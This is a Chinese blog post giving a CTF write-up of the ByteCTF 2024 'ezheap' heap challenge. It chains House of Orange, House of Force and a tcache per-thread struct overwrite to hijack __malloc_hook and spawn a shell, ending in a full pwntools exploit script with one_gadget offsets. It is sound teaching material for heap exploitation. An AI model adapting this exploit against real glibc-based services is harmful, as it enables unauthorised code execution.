【PWN · HOO | HOF | Tcache pthread struct】[2024 · ByteCTF] ezheap

Mr_Fmnwon

于 2024-09-26 21:55:29 发布

阅读量938

点赞数 25

分类专栏：【PWN · Heap】文章标签： pwn ctf heap House of Orange House of Force Tcache

本文链接：https://blog.csdn.net/Mr_Fmnwon/article/details/142576744

版权

【PWN · Heap】专栏收录该内容

14 篇文章 1 订阅

订阅专栏

在学习了一段时间堆后，终于能较为从容、有思路地做题了

（2）House of Force + tcache pthread struct attack

四、EXP

总结

前言

做完后看了几个战队的WP，或多或少方法都有些差异，我的方法可能比较复杂（代码量来看）但是自己上手，遇到问题、想思路什么的，收益颇丰。于是记一篇博客，既是分享，也是总结。

一、题目

自然是保护全开

经典的菜单，但是左边函数名一看，坏了，没有 free

看一下几个函数

add 里面，malloc 的值可以自定义，可以用 HOF （House of Force）

freechunk 里面自然看不到 free，实际运行了一下，也没什么用。

show 里面是按照字符串打印，需要注意 \x00 截断的问题

edit 里面存在任意长度的堆溢出

其中好像有一个 checksanbox 函数似乎是禁止修改 hook 的。但是动调算了一下，好像没有涉及到__malloc_hook（后面过程发现__realloc_hook禁止修改，但是__malloc_hook可以修改。。）

二、总体思路

拿到这题，先发散的想想，该怎么做。没有 free 的情况也算是很经典了，自然而然想到 House of Orange，能够在没有 free 的情况下，泄露 libc 和 heap。

此外呢？之前代码审计的时候看到 malloc 没有限制，完全按照自己输入的 size 进行申请内存，而且存在任意长度的堆溢出，所以 House of Force 也是可行的。

程序开了PIE，House of Force 能够劫持 Top chunk 到任意位置，想劫持到 chunklist 但是地址不清楚啊；那就考虑偏移，即堆上是否有能够利用的地方呢，我通过偏移劫持到堆的某个位置？或者劫持到 libc 上？—— 如果劫持到 libc 上，修改__malloc_hook，或许可行。但是堆上也有一个结构可以利用，而我做题还没有遇到，所以想试试—— Tcache pthread struct。如果能劫持 tcache pthread struct，就能够做到任意地址分配，实现任意地址写，再修改__malloc_hook。（虽然好像多走了一步。。但是能够保证 topchunk 还是在堆区，可以避免很多问题，此外，在堆区意味着只需要知道偏移，而不一定需要知道具体的堆地址）

因此总结思路如下：
House of Orange （泄露 libc 、heapbase）---> House of Force （劫持tcache pthread struct）---> tcache pthread struct attack （修改__malloc_hook）---> 打ogg

三、攻击过程调试

调试时自然是遇到很多问题，现在是 exp 通过后，因此就直接上正确的调试过程，不再做过程中遇到问题的一些解释。

（1）House of Orange

至此，House of Orange 的攻击结束，成功 leak libc 和 heap

（2）House of Force + tcache pthread struct attack

四、EXP

from pwn import *
libc=ELF("./libc-2.27.so")
elf=ELF("./pwn")
context(arch=elf.arch,log_level='debug')

def add(size):
    io.sendlineafter(b'to exit:\n',b'1')
    io.sendlineafter(b'add:\n',str(size).encode())

def show(index):
    io.sendlineafter(b'to exit:\n',b'3')
    io.sendlineafter(b'show:\n',str(index).encode())

def edit(index,size,content):
    io.sendlineafter(b'to exit:\n',b'4')
    io.sendlineafter(b'edit:\n',str(index).encode())
    io.sendlineafter(b'size\n',str(size).encode())
    io.sendlineafter(b'input\n',content)

io=process("./pwn")
gdb.attach(io)

### house of orange
# leak libc
add(0x30)
edit(0,0x40,p64(0)*7+p64(0x0d71))
add(0xe00)
add(0x40)
show(2)
io.recvuntil(b': ')
libc_base=u64(io.recv(6).ljust(8,b'\x00'))-0x3ec2a0
libc.address=libc_base
info('libc_base: '+hex(libc_base))
malloc_hook=libc_base+0x3ebc30
info('__malloc_hook: '+hex(malloc_hook))

# leak heap
edit(2,0x10,b'aaaaaaaaaaaaaaaa')
show(2)
io.recvuntil(b': ')
io.recv(0x10)
heap_base=u64(io.recv(6).ljust(8,b'\x00')) & 0xfffffffffffff000
info('heap_base: '+hex(heap_base))

### House of force 打 tcache pthread struct
add(0xd00-0x10)
add(0x20)
edit(4,0x30,p64(0)*5+b'\xff'*8)
add(-138826)
add(0x70)
edit(6,64+0x8,p8(1)+p8(0)*63+p64(malloc_hook))
add(0x10)
'''
0x4f2be execve("/bin/sh", rsp+0x40, environ)
constraints:
  address rsp+0x50 is writable
  rsp & 0xf == 0
  rcx == NULL || {rcx, "-c", r12, NULL} is a valid argv

0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  address rsp+0x50 is writable
  rsp & 0xf == 0
  rcx == NULL || {rcx, rax, r12, NULL} is a valid argv

0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL || {[rsp+0x40], [rsp+0x48], [rsp+0x50], [rsp+0x58], ...} is a valid argv

0x10a38c execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL || {[rsp+0x70], [rsp+0x78], [rsp+0x80], [rsp+0x88], ...} is a valid argv

'''
edit(7,0x8,p64(libc_base+0x4f322))
add(0)
io.interactive()